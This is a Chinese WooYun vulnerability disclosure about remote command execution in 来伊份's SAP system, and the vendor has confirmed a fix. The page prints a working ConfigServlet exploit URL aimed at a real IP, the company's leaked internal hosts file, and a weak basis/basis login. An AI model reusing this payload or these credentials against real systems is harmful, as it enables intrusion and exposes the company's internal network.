当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148595

漏洞标题:来伊份某处SAP系统命令执行

相关厂商:上海来伊份股份有限公司

漏洞作者: 0xafei

提交时间:2015-10-22 12:42

修复时间:2015-12-10 15:12

公开时间:2015-12-10 15:12

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

来伊份(http://www.laiyifen.com/)某系统未及时打补丁,导致命令执行

详细说明:

http://180.153.17.43:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c net user


另外http://180.153.17.43/names.nsf
貌似弱口令还是没有解决。

漏洞证明:

http://180.153.17.43:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/hosts
TYPE=S<BR>STATE=<BR>INFO_SHORT= + Process created!
## Configured using SAM by root on Sat Dec 11 16:11:15 2010
# @(#)B.11.31_LRhosts $Revision: 1.9.214.1 $ $Date: 96/10/08 13:20:01 $
#
# The form for each entry is:
# <internet address> <official hostname> <aliases>
#
# For example:
# 192.1.2.34 hpfcrm loghost
#
# See the hosts(4) manual page for more information.
# Note: The entries cannot be preceded by a space.
# The format described in this file is the correct format.
# The original Berkeley manual page contains an error in
# the format description.
#
127.0.0.1 localhost loopback
10.1.0.203 basis basis.laiyifen.com
10.1.0.223 prdapp01
10.1.0.177 prdapp02
10.1.0.107 prdb prdb.eip.laiyifen.com
10.1.0.108 epbwdev epbwdev.laiyifen.com
10.1.0.67 prddbci1
10.1.0.68 prddbci2
10.1.0.102 epbwqas epbwqas.laiyifen.com
10.1.0.103 epprd1 epprd1.laiyifen.com
10.1.0.110 epprd2 epprd2.laiyifen.com
10.1.0.120 eppdbscs eppdbscs.laiyifen.com
10.1.0.120 eppweb epprd.laiyifen.com eppweb.laiyifen.com
10.1.0.134 trexdev trexdev.laiyifen.com
10.1.0.246 SAPPP3
10.1.0.248 SAPPP3B
10.1.0.251 SAPPP3A
10.1.0.142 nakisadev nakisadev.laiyifen.com
10.0.0.151 tst
10.1.0.27 Mail lyfml01 lyfml01.laiyifen.com mailsvr01 lyfml01\
10.1.0.109 lyf-eva
10.1.0.131 NH-K13-DPserver
10.1.0.143 nakisaprd nakisaprd.laiyifen.com
10.1.0.117 awdb1
10.1.0.157 HsAppSvr1
10.1.0.101 bwprd1
10.1.0.105 bwprd2
10.1.0.125 bwprd3
10.2.1.11 msc1
10.1.0.113 eptest eptest.laiyifen.com
10.2.3.11 webserver1
10.1.0.65 posdmdq posdmdq.laiyifen.com
# sap service IP address
194.39.131.34 sapserv2
#add at 20120210
10.1.0.141 trexprd trexprd.laiyifen.com
10.1.0.202 hpdp hpdp.laiyifen.com
10.1.0.43 new_qas_dev new_qas_dev.laiyifen.com qas.laiyifen.com
<BR>CONFIGURATION=


供应商系统

http://180.153.17.43/names.nsf basis/basis


修复方案:

其他同类漏洞说打以下两个补丁
SAP 1467771
SAP 1445998

版权声明:转载请注明来源 0xafei@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-26 15:12

厂商回复:

SAP漏洞,已经修复

最新状态:

暂无


漏洞评价:

评价